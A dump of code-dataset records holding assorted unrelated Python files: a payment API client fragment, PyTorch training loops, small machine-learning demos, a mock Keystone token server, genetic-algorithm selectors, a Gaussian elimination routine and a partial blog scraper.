headers[\"Content-Type\"] = \"application/json\"\n\n payload = {\n 'id': transaction_id,\n 'amount': amount,\n 'precision': precision,\n 'memo': memo,\n 'from_asset_id': from_asset_id,\n 'to_asset_id': to_asset_id\n }\n\n result = urlfetch.fetch(\n url=u\"%s/transactions\" % base_url,\n payload=json.dumps(payload),\n method=urlfetch.POST,\n headers=headers,\n deadline=10)\n\n if result.status_code not in (200, 201):\n logging.debug('Error from ThreeFold backend: %s %s', result.status_code, result.content)\n language = get_lang(app_user)\n raise PaymentException(ErrorPaymentTO.UNKNOWN, language)\n\n return json.loads(result.content)[\"status\"]\n\n\n@returns(TargetInfoTO)\n@arguments(target_user=users.User, currency=unicode, settings=dict)\ndef get_target_info_service(target_user, currency, settings):\n return 
None\n","sub_path":"src/rogerthat/bizz/payment/providers/threefold/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":10239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"50544677","text":"import os\nimport time\nimport random\nfrom copy import copy\n\nimport numpy as np\nimport torch\n\nfrom tensorboardX import SummaryWriter\n\nfrom torchsupport.data.io import netwrite, to_device\nfrom torchsupport.data.episodic import SupportData\nfrom torchsupport.data.collate import DataLoader\n\nfrom torchsupport.training.state import (\n TrainingState, NetState, State, SaveStateError\n)\n\nclass Training(object):\n \"\"\"Abstract training process class.\"\"\"\n checkpoint_parameters = []\n torch_rng_state = torch.random.get_rng_state()\n np_rng_state = np.random.get_state()\n random_rng_state = random.getstate()\n\n save_interval = 600\n last_tick = 0\n\n def __init__(self):\n pass\n\n def each_step(self):\n self.save_tick()\n\n def each_validate(self):\n pass\n\n def each_epoch(self):\n pass\n\n def each_checkpoint(self):\n pass\n\n def train(self):\n pass\n\n def validate(self):\n pass\n\n def save_path(self):\n raise NotImplementedError(\"Abstract.\")\n\n def write(self, path):\n data = {}\n data[\"_torch_rng_state\"] = torch.random.get_rng_state()\n data[\"_np_rng_state\"] = np.random.get_state()\n data[\"_random_rng_state\"] = random.getstate()\n for param in self.checkpoint_parameters:\n param.write_action(self, data)\n torch.save(data, path)\n\n def read(self, path):\n data = torch.load(path)\n torch.random.set_rng_state(data[\"_torch_rng_state\"])\n np.random.set_state(data[\"_np_rng_state\"])\n random.setstate(data[\"_random_rng_state\"])\n for param in self.checkpoint_parameters:\n param.read_action(self, data)\n\n def save(self, path=None):\n path = path or self.save_path()\n self.write(path)\n\n def save_tick(self, step=None):\n step = step or self.save_interval\n this_tick = time.monotonic()\n if this_tick - self.last_tick > step:\n try:\n self.save()\n self.last_tick = this_tick\n except SaveStateError:\n torch_rng_state = torch.random.get_rng_state()\n np_rng_state = np.random.get_state()\n random_rng_state = random.getstate()\n self.load()\n torch.random.set_rng_state(torch_rng_state)\n np.random.set_state(np_rng_state)\n random.setstate(random_rng_state)\n\n def load(self, path=None):\n path = path or self.save_path()\n if os.path.isfile(path):\n self.read(path)\n return self\n\nclass SupervisedTraining(Training):\n \"\"\"Standard supervised training process.\n\n Args:\n net (Module): a trainable network module.\n train_data (DataLoader): a :class:`DataLoader` returning the training\n data set.\n validate_data (DataLoader): a :class:`DataLoader` return ing the\n validation data set.\n optimizer (Optimizer): an optimizer for the network. Defaults to ADAM.\n schedule (Schedule): a learning rate schedule. 
Defaults to decay when\n stagnated.\n max_epochs (int): the maximum number of epochs to train.\n device (str): the device to run on.\n checkpoint_path (str): the path to save network checkpoints.\n \"\"\"\n checkpoint_parameters = Training.checkpoint_parameters + [\n TrainingState(),\n NetState(\"net\"),\n NetState(\"optimizer\")\n ]\n def __init__(self, net, train_data, validate_data, losses,\n optimizer=torch.optim.Adam,\n schedule=None,\n max_epochs=50,\n batch_size=128,\n accumulate=None,\n device=\"cpu\",\n network_name=\"network\",\n path_prefix=\".\",\n report_interval=10,\n checkpoint_interval=1000,\n num_workers=8,\n valid_callback=lambda x: None):\n super(SupervisedTraining, self).__init__()\n self.valid_callback = valid_callback\n self.network_name = network_name\n self.batch_size = batch_size\n # self.train_writer = SummaryWriter(f'{network_name}-train')\n # self.valid_writer = SummaryWriter(f'{network_name}-valid')\n # self.meta_writer = SummaryWriter(f'{network_name}-meta')\n self.device = device\n self.accumulate = accumulate\n self.num_workers = num_workers\n self.optimizer = optimizer(net.parameters())\n if schedule is None:\n self.schedule = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, patience=10)\n else:\n self.schedule = schedule\n self.losses = losses\n self.train_data = DataLoader(\n train_data, batch_size=batch_size, num_workers=self.num_workers, shuffle=True, drop_last=True\n )\n self.validate_data = DataLoader(\n validate_data, batch_size=batch_size, num_workers=self.num_workers, shuffle=True, drop_last=True\n )\n self.net = net.to(self.device)\n self.max_epochs = max_epochs\n self.checkpoint_path = f\"{path_prefix}/{network_name}-checkpoint\"\n self.report_interval = report_interval\n self.checkpoint_interval = checkpoint_interval\n self.step_id = 0\n self.epoch_id = 0\n self.validation_losses = [0 for _ in range(len(self.losses))]\n self.training_losses = [0 for _ in range(len(self.losses))]\n self.best = None\n\n def save_path(self):\n return self.checkpoint_path + \"-save.torch\"\n\n def checkpoint(self):\n the_net = self.net\n if isinstance(the_net, torch.nn.DataParallel):\n the_net = the_net.module\n netwrite(\n self.net,\n f\"{self.checkpoint_path}-epoch-{self.epoch_id}-step-{self.step_id}.torch\"\n )\n self.each_checkpoint()\n\n def run_networks(self, data):\n inputs, *labels = data\n if not isinstance(inputs, (list, tuple)):\n inputs = [inputs]\n predictions = self.net(*inputs)\n if not isinstance(predictions, (list, tuple)):\n predictions = [predictions]\n return [combined for combined in zip(predictions, labels)]\n\n def loss(self, inputs):\n loss_val = torch.tensor(0.0).to(self.device)\n for idx, the_input in enumerate(inputs):\n this_loss_val = self.losses[idx](*the_input)\n self.training_losses[idx] = float(this_loss_val)\n loss_val += this_loss_val\n return loss_val\n\n def valid_loss(self, inputs):\n training_cache = list(self.training_losses)\n loss_val = self.loss(inputs)\n self.validation_losses = self.training_losses\n self.training_losses = training_cache\n return loss_val\n\n def step(self, data):\n if self.accumulate is None:\n self.optimizer.zero_grad()\n outputs = self.run_networks(data)\n loss_val = self.loss(outputs)\n loss_val.backward()\n torch.nn.utils.clip_grad_norm_(self.net.parameters(), 5.0)\n if self.accumulate is None:\n self.optimizer.step()\n elif self.step_id % self.accumulate == 0:\n self.optimizer.step()\n self.optimizer.zero_grad()\n self.each_step()\n\n def validate(self, data):\n with torch.no_grad():\n 
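      # evaluation pass: switch to eval mode, score one held-out batch, record the
      # per-loss values via valid_loss, then flip back to train mode afterwards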
self.net.eval()\n outputs = self.run_networks(data)\n self.valid_loss(outputs)\n self.each_validate()\n self.valid_callback(\n self, to_device(data, \"cpu\"), to_device(outputs, \"cpu\")\n )\n self.net.train()\n\n def schedule_step(self):\n self.schedule.step(sum(self.validation_losses))\n\n def each_step(self):\n Training.each_step(self)\n for idx, loss in enumerate(self.training_losses):\n self.train_writer.add_scalar(f\"loss {idx}\", loss, self.step_id)\n self.train_writer.add_scalar(f\"loss total\", sum(self.training_losses), self.step_id)\n\n def each_validate(self):\n for idx, loss in enumerate(self.validation_losses):\n self.valid_writer.add_scalar(f\"loss {idx}\", loss, self.step_id)\n self.valid_writer.add_scalar(f\"loss total\", sum(self.validation_losses), self.step_id)\n\n def each_epoch(self):\n for tag in [f\"loss {idx}\" for idx in range(len(self.training_losses))] + \\\n [f\"loss total {idx}\" for idx in range(len(self.validation_losses))]:\n # make a straight line in the tensorboard at the start of every epoch\n self.meta_writer.add_scalar(tag, self.epoch_id, self.step_id)\n self.meta_writer.add_scalar(tag, 0, self.step_id)\n self.meta_writer.add_scalar(tag, self.epoch_id, self.step_id)\n\n def train(self):\n for epoch_id in range(self.max_epochs):\n self.epoch_id = epoch_id\n valid_iter = iter(self.validate_data)\n for data in self.train_data:\n data = to_device(data, self.device)\n self.step(data)\n if self.step_id % self.report_interval == 0:\n vdata = None\n try:\n vdata = next(valid_iter)\n except StopIteration:\n valid_iter = iter(self.validate_data)\n vdata = next(valid_iter)\n vdata = to_device(vdata, self.device)\n self.validate(vdata)\n if self.step_id % self.checkpoint_interval == 0:\n self.checkpoint()\n self.step_id += 1\n self.schedule_step()\n self.each_epoch()\n return self.net\n\nclass MaskedSupervisedTraining(SupervisedTraining):\n def run_networks(self, data):\n inputs, labels_masks = data\n labels = [label for (label, mask) in labels_masks]\n masks = [mask for (label, mask) in labels_masks]\n predictions = self.net(inputs)\n return list(zip(predictions, labels, masks))\n\nclass FewShotTraining(SupervisedTraining):\n def __init__(self, net, train_data, validate_data, losses,\n optimizer=torch.optim.Adam,\n schedule=None,\n max_epochs=50,\n batch_size=128,\n device=\"cpu\",\n network_name=\"network\",\n path_prefix=\".\",\n report_interval=10,\n checkpoint_interval=1000,\n valid_callback=lambda x: None):\n super(FewShotTraining, self).__init__(\n net, train_data, validate_data, losses,\n optimizer=optimizer,\n schedule=schedule,\n max_epochs=max_epochs,\n batch_size=batch_size,\n device=device,\n network_name=network_name,\n path_prefix=path_prefix,\n report_interval=report_interval,\n checkpoint_interval=checkpoint_interval,\n valid_callback=valid_callback\n )\n\n support_data = copy(train_data)\n train_data.data_mode = type(train_data.data_mode)(1)\n support_data = SupportData(train_data, shots=5)\n validate_support_data = SupportData(validate_data, shots=5)\n self.support_loader = iter(DataLoader(support_data))\n self.valid_support_loader = iter(DataLoader(validate_support_data))\n\n def run_networks(self, data, support, support_label):\n predictions = self.net(data, support)\n return list(zip(predictions, support_label))\n\n def step(self, inputs):\n data, label = inputs\n self.optimizer.zero_grad()\n\n permutation = [0, 1, 2]\n random.shuffle(permutation)\n\n support, support_label = next(self.support_loader)\n\n lv = label[0].reshape(-1)\n for idx, 
val in enumerate(lv):\n lv[idx] = permutation[int(val[0])]\n lv = support_label.reshape(-1)\n for idx, val in enumerate(lv):\n lv[idx] = permutation[int(val[0])]\n\n support = support[0].to(self.device)\n support_label = support_label[0].to(self.device)\n outputs = self.run_networks(data, support, support_label)\n\n loss_val = self.loss(outputs)\n loss_val.backward()\n self.optimizer.step()\n self.each_step() \n\n def validate(self):\n with torch.no_grad():\n self.net.eval()\n vit = iter(self.validate_data)\n inputs, *label = next(vit)\n inputs, label = inputs.to(self.device), list(map(lambda x: x.to(self.device), label))\n support, support_label = next(self.valid_support_loader)\n support = support[0].to(self.device)\n support_label = support_label[0].to(self.device)\n outputs = self.run_networks(inputs, support, support_label)\n self.valid_loss(outputs)\n self.each_validate()\n self.valid_callback(self, to_device(inputs, \"cpu\"), to_device(outputs, \"cpu\"))\n self.net.train()\n","sub_path":"torchsupport/training/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":11727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"566875","text":"from sklearn.datasets import load_iris\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.linear_model import Perceptron\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef load_iris_3classes():\n data = load_iris()\n return data.data,data.target\n\ndef load_iris_binary():\n data = load_iris()\n X = data.data\n y = data.target\n y[y == 2] = 1\n\n return X,y\n\ndef plota_dados(X, weights):\n plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Set1, edgecolor='k')\n\n # x_line = np.linspace(-1,1,15)\n # y_line = weights[0, 1]/x_line\n\n # for i in range(0, len(weights[0, :])):\n # plt.plot(x_line, y_line)\n #\n plt.show()\n\nif __name__ == '__main__':\n\n\n # X, y = load_iris_3classes()\n X, y = load_iris_binary()\n\n clf = Perceptron(tol=1e-3)\n clf.fit(X, y)\n\n print(clf.coef_)\n print(clf.intercept_)\n print(clf.predict(X))\n\n plota_dados(X, clf.coef_)\n\n\n","sub_path":"7_perceptron.py","file_name":"7_perceptron.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"224849083","text":"from network.model import p_net, r_net, o_net\nfrom network.train_model import train\nimport argparse\nimport os\nimport sys\nimport config as FLAGS\n\nos.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\nos.environ['CUDA_VISIBLE_DEVICES'] = '{}'.format(FLAGS.gpu)\n\nroot_dir = os.path.dirname(__file__).split('MTCNN')[0]\nproject_dir = os.path.dirname(__file__).split('MTCNN')[1]\n\ndef main(save_dir, input_size):\n base_dir = os.path.join(save_dir, input_size)\n net = None\n if input_size == '12':\n net = 'pnet'\n net_factory = p_net\n end_epoch = FLAGS.end_epoch[0]\n elif input_size == '24':\n net = 'rnet'\n net_factory = r_net\n end_epoch = FLAGS.end_epoch[1]\n else:\n net = 'onet'\n net_factory = o_net\n end_epoch = FLAGS.end_epoch[2]\n\n model_dir = os.path.join(root_dir + 'MTCNN' + '/checkpoint', net)\n if not os.path.exists(model_dir):\n os.mkdir(model_dir)\n model_prefix = os.path.join(model_dir, net)\n display = FLAGS.display\n lr = FLAGS.lr\n train(net_factory, model_prefix, end_epoch, base_dir, display, lr)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='train')\n parser.add_argument('--save_dir', type=str, default='/mnt/data/changshuang/gen_data',\n 
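                        # help (Chinese): 'path where the generated images are saved';
                        # the --input_size help below reads 'input image size for the chosen network'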
help='保存图片路径')\n parser.add_argument('--input_size', type=str, default='48', choices=['12', '24', '48'],\n help='对于具体网络输入图片的大小')\n args = parser.parse_args()\n main(args.save_dir, args.input_size)\n\n \n","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"192298256","text":"# Copyright 2016 Red Hat, Inc.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n#\n# Refer to the README and COPYING files for full details of the license\n#\n\nfrom BaseHTTPServer import BaseHTTPRequestHandler\n\n\nclass GetTokenHandler(BaseHTTPRequestHandler):\n\n def do_POST(self):\n self.send_response(200)\n self.send_header(\"Content-Type\", \"Application/json\")\n self.send_header(\"x-openstack-request-id\",\n \"req-edf1f07f-1ccf-4d42-a073-b2bd99bb9f4a\")\n\n self.end_headers()\n self.wfile.write(self.response_string)\n return\n\n response_string = \"\"\"\n\n{\n\"access\":{\n \"token\":{\n\n \"id\": \"b591657e28e54b4ca1032cfc3e426e0a\"\n }\n}}\n\"\"\"\n\n\"\"\"\nRequest:\n\nPOST\nhttp://192.168.120.151:35357/v2.0/tokens\nheaders={Content-Type=[application/json]}\n\n{\"auth\":\n{\"tenantName\": \"admin\", \"passwordCredentials\": {\"username\": \"admin\", \"password\": \"f0d910204e194de7\"}}}\n\n\"\"\"\n","sub_path":"ovn-provider/handler_keystone.py","file_name":"handler_keystone.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"41607286","text":"#genetic algorithm selection routines\n#based on galib.\n#exception - these classes only work on the scaled fitness\n\nimport numpy as np\n\nfrom ga_util import GAError\nfrom prng import prng\n\nclass selector(object):\n def update(self,pop):\n pass\n def select(self,pop):\n raise GAError('selector.select() must be overridden')\n def clear(self):\n pass\n\nclass uniform_selector(selector):\n def select(self,pop,cnt = 1):\n if cnt == 1:\n return prng.choice(pop)\n res = []\n for i in range(cnt):\n res.append(prng.choice(pop))\n return res\n\n#class rank_selector(selector):\n# def select(self,pop,cnt = 1):\n# pop.sort()\n# studliest = pop[0].fitness()\n# # XXX: y?\n# tied_for_first = [x for x in pop if x.fitness() == y]\n# if cnt == 1:\n# return prng.choice(tied_for_first)\n# res = []\n# for i in range(cnt):\n# res.append(prng.choice(tied_for_first))\n# return res\n\n#scores must all be positive\nclass roulette_selector(selector):\n def update(self,pop):\n self.pop = pop[:]\n sz = len(pop)\n if not sz:\n raise GAError('srs_selector - the pop size is 0!')\n f =self.pop.fitnesses()\n f_max = max(f); f_min = min(f)\n if not ( (f_max >= 0 and f_min >= 0) or\n (f_max <= 0 and f_min <= 0)):\n raise GAError('srs_selector requires all fitnesses values to be either strictly positive or 
strictly negative')\n if f_max == f_min:\n f = np.ones_like(f)\n self.dart_board = np.add.accumulate(f / sum(f,axis=0))\n\n def select(self,pop,cnt = 1):\n returns = []\n for i in range(cnt):\n dart = prng.random()\n idx = 0\n #binary search would be faster\n while dart > self.dart_board[idx]:\n idx = idx + 1\n returns.append(self.pop[idx])\n if cnt == 1:\n return returns[0]\n else:\n return returns\n\n def clear(self):\n del self.pop\n\n#scores must all be positive\nclass srs_selector(selector):\n def update(self,pop):\n sz = len(pop)\n if not sz:\n raise GAError('srs_selector - the pop size is 0!')\n f =pop.fitnesses()\n f_max = max(f); f_min = min(f)\n if not ( (f_max >= 0. and f_min >= 0.) or\n (f_max <= 0. and f_min <= 0.)):\n raise GAError('srs_selector requires all fitnesses values to be either strictly positive or strictly negative - min %f, max %f' %(f_min,f_max))\n f_avg = sum(f,axis=0)/sz\n if f_avg == 0.:\n e = np.ones_like(f)\n else:\n if pop.min_or_max() == 'max':\n e = f/f_avg\n else:\n e = (-f+f_max+f_min)/f_avg\n self.expected_value = e\n garauntee,chance = divmod(e,1.)\n# garauntee = floor(e)\n# chance = remainder(e,1)\n choices = []\n for i in xrange(sz):\n choices = choices + [pop[i]] * int(garauntee[i])\n #now deal with the remainder\n dart_board = np.add.accumulate(chance / sum(chance,axis=0))\n for i in range(len(choices),sz):\n dart = prng.random()\n idx = 0\n while dart > dart_board[idx]:\n idx = idx + 1\n choices.append(pop[idx])\n self.choices = choices\n\n def select(self,pop,cnt = 1): #ignore the past in pop\n res = []\n for i in range(cnt):\n res.append(prng.choice(self.choices))\n# for chosen in res: self.choices.remove(chosen)\n if cnt == 1:\n return res[0]\n return res\n\n def clear(self):\n if hasattr(self,'choices'):\n del self.choices\n","sub_path":"python/packages/scipy-0.6.0/scipy/sandbox/ga/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"583590697","text":"from __future__ import print_function\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass LeNet(nn.Module):\n def __init__(self,rho = 0.001):\n super(LeNet, self).__init__()\n\n self.conv1 = nn.Conv2d(1, 20, 3, stride=1, padding=1)\n self.conv2 = nn.Conv2d(20, 50, 3, stride=1, padding=1)\n self.fc1 = nn.Linear(7 * 7 * 50, 500)\n self.fc2 = nn.Linear(500, 10)\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv2(x))\n x = F.max_pool2d(x, 2, 2)\n x = x.view(-1, 7 * 7 * 50)\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return F.log_softmax(x, dim=1)\n","sub_path":"lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"566058020","text":"import numpy as np\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight')\nimport pandas as pd\nimport random as rand\n\n\ndef k_fold_cross_validation(class_i,k_fold):\n #K-Fold Cross Validation and evaluation\n n = len(class_i)\n training_set = [[]for x in range(n)]\n testing_set = [[]for x in range(n)]\n #Every class has the same number of data, so you randomly pick class: 0\n initial_data = len(class_i[0])\n step = int(initial_data/k_fold)\n residual = initial_data - step*k_fold\n num_of_data = initial_data - residual\n\n for class_index in range(n):\n for start in range(0,num_of_data,step):\n 
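            # each fold takes one contiguous block of `step` samples as the test split
            # and concatenates the remaining blocks to form the training split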
testing_set[class_index].append(class_i[class_index][start:start+step])\n if(start == 0):\n training_set[class_index].append(class_i[class_index][start+step:num_of_data])\n else:\n training_set[class_index].append(class_i[class_index][0:start])\n training_set[class_index][-1]+=(class_i[class_index][start+step:num_of_data])\n return training_set,testing_set\n\n# Correct and wrong answers for each fold\ndef calc_confusion_matrix(classes,testing_set,class_weights,fold):\n num_of_classes = len(testing_set)\n num_of_points_in_fold = len(testing_set[0][0])\n correct = 0\n wrong = 0\n for class_index in range(num_of_classes):\n for point in (testing_set[class_index][fold]):\n result = score_set(class_weights,fold,point)\n if(result == class_index):\n correct += 1\n else:\n wrong += 1\n return [correct,wrong]\n\n#Predicts in which class a point is classified\ndef score_set(w,fold,point):\n scores = []\n num_of_classes = len(class_weights)\n num_of_x = len(point)\n #input(num_of_weights)\n for class_index in range(num_of_classes):\n b = w[class_index][fold][0]\n h = 0\n for i in range(num_of_x):\n h += w[class_index][fold][i+1]*point[i]\n h += b\n score = (1-h)**2 #y-y_predicted\n scores.append(score)\n class_classified_to = scores.index(max(scores))\n return class_classified_to\n\n\ndef observedValue(Y,class_index,sets):\n start = class_index*sets\n stop = class_index*sets + sets\n for i in range(len(Y)):\n Y[i] = 1\n for i in range(start,stop):\n Y[i] *= -1\n return Y\n\n\n#Features get a discrete value of 1 or -1\nfeatures_y = []\n#To store all the data, for each class and each class's color for plotting. We have n classes\nn = 3\nclass_i = [[]for x in range(n)]\ncolor = [\"blue\",\"orange\",\"green\"]\n#Data points m for each class\nm = 100\n#Storing weights for each class, for each training set\nclass_weights = [[]for x in range(n)]\n#For confusion matrix, evaluating each k - fold corss validation\nevaluate_set = []\n\n\n\n#Points for feature A\nfor i in range(m):\n x1 = rand.randint(20,60)\n x2 = rand.randint(20,60)\n class_i[0].append([x1,x2])\n features_y.append(1)\n\n#Points for feature B\nfor i in range(m):\n x1 = rand.randint(60,100)\n x2 = rand.randint(80,120)\n class_i[1].append([x1,x2])\n features_y.append(-1)\n\n#Points for feature C\nfor i in range(m):\n x1 = rand.randint(100,140)\n x2 = rand.randint(20,60)\n class_i[2].append([x1,x2])\n features_y.append(-1)\n\nfor i in range(int(m/4)):\n for j in range(3):\n x1 = rand.randint(20,140)\n x2 = rand.randint(20,120)\n pos = rand.randint(0,m-1)\n class_i[j][pos] = [x1,x2]\n\n\n#Setting training and testing set, divided by K for cross validation\nk = 10\ntraining_set,testing_set = k_fold_cross_validation(class_i,k)\n#training_points is the number of training sets for each class. 
training_points = all_points - testing_points.\n#Every class has same num of training points, so we pick randomly, say class 0 training set 0\nm = m - m%k\ntraining_points = len(training_set[0][0])\n#input(training_points)\ntesting_points = len(testing_set[0][0])\n#input(testing_points)\n#Setting y vector\ny = np.concatenate((features_y[0*m:0*m+m-testing_points],features_y[(0+1)*m:(0+1)*m+m-testing_points])).T\nfor i in range(1,n-1):\n y = np.concatenate((y,features_y[(i+1)*m:(i+1)*m+m-testing_points])).T\n\n\n\n #TRAINING PHASE\n\n#k = num of folds, n = num of classes\nfor i in range(k):\n for class_index in range(n):\n for point in range(training_points):\n plt.scatter(training_set[class_index][i][point][0],training_set[class_index][i][point][1],color = color[class_index])\n X = np.vstack((training_set[0][i],training_set[1][i]))\n X = np.vstack((X,training_set[2][i]))\n m = len(X)\n X = np.array([np.ones(m), X[:, 0], X[:, 1]]).T\n #Calculate weights for each class ,for each training set(k)\n #Linear Equation for solving this problem is computed by W = ((XTX)^−1)XTy\n for class_index in range(n):\n y = observedValue(y,class_index,training_points)\n w_i = np.linalg.inv(X.T @ X) @ (X.T @ y)\n class_weights[class_index].append(w_i)\n\n\n #TESTING PHASE\n\n#testing_points = number of points to test\n#Every class has the same number of testing point, so we pick one randomly, say class 0 testing set 0\n\n#Calculating confusion matrix for each training set\nconfusion_matrix = []\n\nfor fold in range(len(testing_set[0])):\n results = calc_confusion_matrix(class_i,testing_set,class_weights,fold)\n confusion_matrix.append(results)\n\nprint(confusion_matrix)\n\nfor i in range(len(confusion_matrix)):\n if(confusion_matrix[i][0] == 0):\n evaluate_set.append(0)\n else:\n evaluate_set.append(confusion_matrix[i][0]/testing_points) #confusion_matrix[i][0] number of correct guesses for class all classes in data set i\n\n#To store the weights of the classes which had the best evaluated set( if many sets scored equally, we get the first one)\nwinning_weights = []\n\n#Index of the highest scored set\nbest_set = evaluate_set.index(max(evaluate_set))\nfor i in range(n):\n winning_weights.append(class_weights[i][best_set])\n\n\nprint(\"The best weights came from the set: \",best_set)\n\n\n#Plotting classes and decision boarders\nline_x = np.linspace(0,140)\nclass_index = 0\nfor class_i in winning_weights:\n class_index += 1\n line_y = -class_i[0] / class_i[2] - (class_i[1] / class_i[2]) * line_x\n plt.plot(line_x,line_y,label = 'Class ' + str(class_index))\n\nplt.title('Training set selected : '+str(best_set))\nplt.legend()\nplt.tight_layout()\nplt.show()\n","sub_path":"Linear problems/LSBinaryClassifier.py","file_name":"LSBinaryClassifier.py","file_ext":"py","file_size_in_byte":6444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"191447761","text":"from itertools import product\nimport numpy as np\n\n\ndef gauss_elim(A):\n m, n = A.shape\n\n if A.any() != 0:\n v, i = next((A[i, j], i)\n for j, i in product(range(n), range(m))\n if A[i, j] != 0)\n A[i, :] /= v\n A[[i, 0], :] = A[[0, i], :]\n for i in range(1, m):\n if A[i, 0] != 0:\n A[i, :] -= A[0, :] * A[i, 0]\n\n gauss_elim(A[1:, 1:])\n return A\n\n\nif __name__ == '__main__':\n VectorA = [[0], [0], [9]]\n MatrixA = np.array([[0, -1, -1],\n [-1, 2, -1],\n [-1, -1, 3]],\n dtype=np.float32)\n SystemA = np.append(MatrixA, VectorA, 1)\n VectorB = [[2], [5], [7]]\n MatrixB = np.array([[0, 1, 2],\n [1, -1, 
1],\n [1, 0, 3]],\n dtype=np.float32)\n SystemB = np.append(MatrixB, VectorB, 1)\n\n gauss_elim(SystemA)\n gauss_elim(SystemB)\n\n print(SystemA)\n print(SystemB)\n","sub_path":"linear_algebra/gauss_elimination.py","file_name":"gauss_elimination.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"205740822","text":"import time\r\nimport os\r\nfrom Utils import *\r\nimport IPython.display\r\nimport cv2\r\n\r\n\r\ndef searched_images(params):\r\n image_features, image_attributes = get_image_features(params.get(\"directory\"))\r\n text_features = encode_search_query(params.get(\"search_query\"))\r\n best_photo_ids, similarity = find_best_matches(text_features, image_features.cpu().numpy(), image_attributes,\r\n params.get(\"N_images\", 3))\r\n list_res = []\r\n for i in range(len(best_photo_ids)):\r\n dict_ = {\"Photo_id\": best_photo_ids[i], \"position\": i + 1, \"score\": similarity[i]}\r\n list_res.append(dict_)\r\n\r\n for i in best_photo_ids:\r\n img = cv2.imread(\r\n os.path.join(params.get(\"directory\"), i))\r\n resized_image = cv2.resize(img, (1000, 700))\r\n cv2.imshow(\"sample1\", resized_image)\r\n cv2.waitKey(0)\r\n\r\n return list_res\r\n\r\n\r\nif __name__ == \"__main__\":\r\n params = {\"directory\": r\"C:\\Users\\vaibh\\Downloads\\PM1 Internship\\natural-language-joint-query-search\\images\",\r\n \"search_query\": \"Children playing football\",\r\n \"N_images\": 3}\r\n start = time.time()\r\n list_res = searched_images(params)\r\n end = time.time()\r\n print(end - start)\r\n print(list_res)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"486741762","text":"import collections\n\n\nclass Solution:\n def countCharacters(self, words, chars: str) -> int:\n chars_map = collections.Counter(chars)\n\n num = 0\n for word in words:\n count = True\n\n word_map = collections.Counter(word)\n for k,v in word_map.items():\n if v <= chars_map.get(k,0):\n continue\n else:\n count =False\n\n if count is True:\n num += len(word)\n return num\n\n\n","sub_path":"1160. 拼写单词.py","file_name":"1160. 
拼写单词.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"107918207","text":"# coding:utf-8\n\n\nimport os\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport dutil\n\n\nimage_dir = \"./blog_images\"\nblog_data_dir = \"./blog_data\"\n\n\nclass Blog:\n \"\"\"\n 欅坂のブログは、\n 一つのarticleがあるBlogと、\n 複数のarticleがあるPageで構成されている\n \"\"\"\n def __init__(self):\n self.url = None\n self.created_at = None\n self.title = None\n self.author = None\n self.text = None\n self.images = [] #複数ある場合もある\n self.article = None # 一応純粋なarticleも保存しとく\n\n def set_url(self, url):\n self.url = url\n \n def _get_article(self):\n # TODO: 例外処理する\n r = requests.get(self.url)\n soup = BeautifulSoup(r.content, 'html.parser')\n self.article = soup.find('article')\n \n def set_data(self, article):\n \"\"\"\n page経由で取得の時にarticleからsetできるように設計\n \"\"\"\n innerHead = article.find(\"div\", {\"class\": \"innerHead\"})\n title = innerHead.find(\"h3\").text.strip()\n author = innerHead.find(\"p\", {\"class\": \"name\"}).text\n author = \"\".join(author.split())\n created_at = article.find(\"div\", {\"class\": \"box-bottom\"}).text.strip()\n created_at = \"T\".join(created_at.split(\" \"))\n created_at = \"-\".join(created_at.split(\"/\"))\n pattarn = '[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}'\n created_at = re.match(pattarn , created_at).group()\n text = article.find(\"div\", {\"class\": \"box-article\"}).text\n images = article.find_all(\"img\")\n\n try:\n images = [i[\"src\"] for i in images]\n except 